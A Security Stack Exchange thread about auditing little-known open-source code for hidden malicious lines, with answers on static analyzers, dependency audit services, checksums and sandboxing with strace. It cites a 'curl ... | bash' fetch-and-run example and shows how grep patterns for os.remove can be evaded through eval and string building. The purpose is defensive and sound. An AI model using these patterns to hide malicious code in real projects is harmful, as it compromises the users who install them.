40

How to check whether the source code of an open-source project contains no malicious content? For example, in a set of source code files with altogether 30,000 lines, there might be 1-2 lines containing a malicious statement (e.g. calling curl http://... | bash).

Those projects are not well-known and it cannot be assumed that they are well-maintained. Therefore, the security of reusing their project source code cannot simply rely on blind trust (while it should be a reasonable assumption that it would be safe to download, verify, compile and run cmake directly, it doesn’t sound good to blindly use an arbitrary library hosted on GitHub).

Someone suggested that I filter the source code and remove all non-ASCII and invisible characters (except some trivial ones like line breaks). Then open each file with a text editor and manually read every line. This is somewhat time-consuming, requiring full attention when I read the code, and actually quite error-prone.

As such, I’m looking for general methods to handle such kind of situations. For example, are there any standard tools available? Anything I have to pay attention to if I really have to read manually?

Luc
  • 31,973
  • 8
  • 71
  • 135
tonychow0929
  • 2,247
  • 3
  • 13
  • 14
  • 2
    There are static code analysers. Have you looked into those tools? – schroeder Oct 26 '18 at 12:51
  • Yes, but I have a (possibly wrong) feeling that they employ a blacklisting instead of whitelisting (something like antivirus) which has little use on specifically crafted malicious contents. – tonychow0929 Oct 26 '18 at 13:06
  • 2
    SAST is not just pattern-based blacklisting tool, it's more complex. Mature SAST solution collects every input and every output point of an application, builds every possible dataflows between them and then analyses every internal point where could happen unintended behaviour like data tampering. – odo Oct 26 '18 at 13:14
  • for example, for packages in languages npm/python where they are used deliberately in dozens by developers, there is no review process to accept a component. To make the question less general, do you have a focus on a specific ecosystem? – J. Doe Oct 26 '18 at 13:29
  • Not quite. I’m mainly working with mobile applications, and a lot of programming languages will be used e.g. Swift (with Xcode), Java (both Android and server side), C++ (sharing code), JavaScript, Dart etc – tonychow0929 Oct 26 '18 at 13:40
  • 1
    Run the project in a docker container with the least capabilities that it should need and giving it permissions to modify only the files it should need. If the program fails for some permission error verify what it is trying to do. If the request is legitimate allow it and go on, otherwise you found something fishy. – Bakuriu Oct 26 '18 at 17:41
  • This is a good question. There's a lot that could be done in theory but in practice most people just trust dependencies. One issue is that the best code analysers are expensive commercial tools. Although there are good free tools for some languages. Subtle difference between determining if code is malicious or whether it has security flaws. – paj28 Oct 26 '18 at 23:30
  • 1
    note, it [can be pretty hard](https://en.wikipedia.org/wiki/Underhanded_C_Contest) to determine that some piece of software contains malicious content if the author took some effort to hide it. – Matija Nalis Oct 28 '18 at 00:32
  • The quick solution(s) you listed wouldn't account for tricky tactics, like if the code is base 64 encoded or obscured in some other way. – Justin Oct 29 '18 at 00:40
  • 1
    @Bakuriu I'd like to add that you could `strace` all system calls, and see if something fishy is going on, for instance, the application attempting to stat files it doesn't need to care about. – Ultimate Hawk Oct 29 '18 at 09:17

5 Answers5

22

There are automated and manual approaches.

For automated, you could start with lgtm - a free static code analyser for open source projects and then move to more complex SAST solutions.

For manual - you could build a threat model of your app and run it through OWASP ASVS checklist starting from it's most critical parts. If there is file deletion in your threat model - just call something like this: grep -ir 'os.remove('.

Of course it's better to combine them both.

odo
  • 692
  • 4
  • 6
  • 17
    "If there is file deletion in your threat model - just call something like this: `grep -ir 'os.remove('`.": though if I do `os['remove']('` I've immediately defeated you. – The6P4C Oct 27 '18 at 04:03
  • @The6P4C Then it's another trust problem about coding convention, though malicious code are often deliberately camouflaged. – iBug Oct 27 '18 at 13:52
  • @The6P4C sure, if `grep` was my only tool. But not that easy, because your exploit could be detected with `os\W+remove\W+`. – odo Oct 28 '18 at 13:08
  • 3
    @odo then I'd do `os.unlink` or even `shutil.move`. Against a mildly determined attacker this approach stands no chance. – Calimo Oct 28 '18 at 14:35
20

You either do it yourself or trust someone else

As with most things in life, you must either do it yourself or trust someone else with it. Here trusting covers both having no malicious intent and being competent enough to properly perform the task.

For example, you could file your taxes yourself or trust a tax adviser to do so (who not only should not attempt to defraud you, but also know how to file the taxes!).

If you are a company, doing it by itself will actually be performed by one or several of your employees, which in turn need to be trusted.

The third party you trust, doesn't need to be a single person, either. It could be the Microsoft Windows Development Team, or the Wordpress core developers.

On source code security, you want the expert not only to be well-meaning, but also knowledgeable to code the program in a secure way / find any potential security issues that may be there.

(plus a few additional border systems when treated as a whole, eg. you want that their code did not get compromised while they uploaded it to the repository, or the email from your employee stating the results getting replaced by a malicious hacker inside your network to say that the application was fine)

You will need to evaluate your options, assess the risk associated with each one, and choose the path that best suits your interests (and budget!).

If I were to check the security of the source code of a blog that used Wordpress, I would generally trust that the original code was fine1¹ and check the differences between the official version and the used one. If the website was compromised, that would make it much easier to find out.

¹ Obviously checking the changelog of later versions if it used an outdated one.

However, if it was developed by the nephew of the owner, I would expect to find lots of vulnerabilities there, and would recommend a thorough checking of everything.

In your case, you should evaluate the risk and cost of developing the equivalent of that library (take into account that the chance of issues in your inhouse product is not zero, either, and it will depend -amongst other things- on the quality of the people involved) versus the risk and cost of auditing and using that library.

Now, there may be attenuating factors that simplify the auditing. For example, if the untrusted code can run in an isolated Virtual Machine, that may be enough to not need further auditing (even here, you are trusting the VM implementation). Or it may be considered sufficient to audit the parts of that program that run as root.

For auditing a library, code analysers can help point out problematic parts (as pointed out), but in order to consider it to be clean I would actually have someone read and understand the code, even if superficially.

For instance, the ability to remove arbitrary files is not malicious per se. You need to understand the program in order to know if it makes sense.

Again, it is a matter of the threats and risks for what you are doing. If you are only concerned with the library exfiltrating data, filtering connections at the firewall could be enough. If you are concerned with the library deleting important files (and for some odd reason you can't deny such permission), you could simply scroll by a bunch of code that only did mathematical computations. If that library computes the parameters for launching a rocket... well, you better make sure those computations are correct, too!

Ángel
  • 17,578
  • 3
  • 25
  • 60
3

Use a service

There are professional services such as Black Duck and Whitesource that audit open-source dependencies.

DawnPaladin
  • 131
  • 3
  • 1
    Black Duck doesn't check the code of OS dependencies. They check whether the dependency (at the version shipped with your app) has a **known** vulnerability listed in CVE databases. Please correct me if I am wrong. Source: I receive regular BlackDuck reports from one of our customers. – usr-local-ΕΨΗΕΛΩΝ Oct 27 '18 at 12:04
  • I would also list/recommend VeraCode (veracode.com). I am not affiliated. My company used it once. It scans your non-obfuscated binaries, thus including OSS code, for known vulnerability patterns. Shell commands, usage of old cryptographic algorithms, "phone-home" invocations and other patterns are scanned along with XSS, CSRF vulnerabilities etc. – usr-local-ΕΨΗΕΛΩΝ Oct 27 '18 at 12:06
2

If you use someone elses code then you are more-or-less at the mercy of the integrity mechanisms the maintainers provide - thats true of all software, not just open source.

For both commercial and packaged open-source software (i.e. rpm, deb etc) code signing is common - this proves that you have received is what the signer intended you to receive.

In the case of source code, checksums are usually used. But this has little value unless the checksum is accessible from a different source the the source code.

Note that these are only intended to protect against a MITM type attack on the application.

use an arbitrary library hosted on GitHub

...in which case all the files/versions have a hash published on Github - in order to subvert this, an attacker would need to subvert Github itself or the maintainer's Github account - I can fork anything on Github but it is then attributed to me and the original repository is unaffected unless the maintainer accepts my pull requests. You may have more confidence in the integrity of Github than the maintainers of the code, in which case it would be reasonable to trust a hash published in the same place as the source code.

None of these mechanisms provide protection against malware which was injected before the integrity verification was applied.

Where you have access to the source code, then you have the option of examining the code (which is a lot easier than examining the executables) and there are automated tools for doing so such as those odo suggests.

symcbean
  • 18,278
  • 39
  • 73
1

Static analyzers won't always work

Checks for os.remove anywhere in code will not work on all attackers, as some may simply do eval("os" + ".remove"). Even more advanced regexes can be made, but the attacker can always make their code more complicated, case in point:

x = "r"
eval("os." + x + "emove")

More theoretically, due to the halting problem, it's impossible to check all potential states to see if a dangerous system call is invoked.

An attacker can avoid static code analyzers quite easily by building a small interpreter for a custom language that performs the malicious operations.

Running the code inside a container/honeypot

All software eventually interacts with the operating system. By running the software inside a container or honeypot with strace or a similar tool, you can see what information the program or library is attempting to gather.

Does the program attempt to figure out if it's running inside a container? Does it read files it is not supposed to or even modify them? Then you may have a malicious piece of software.

This won't always work, some manual inspection may be necessary

Some malicious code triggers only on specific dates, but at least you'll see that this is accessed. From there you can inspect where in the code this happens and why.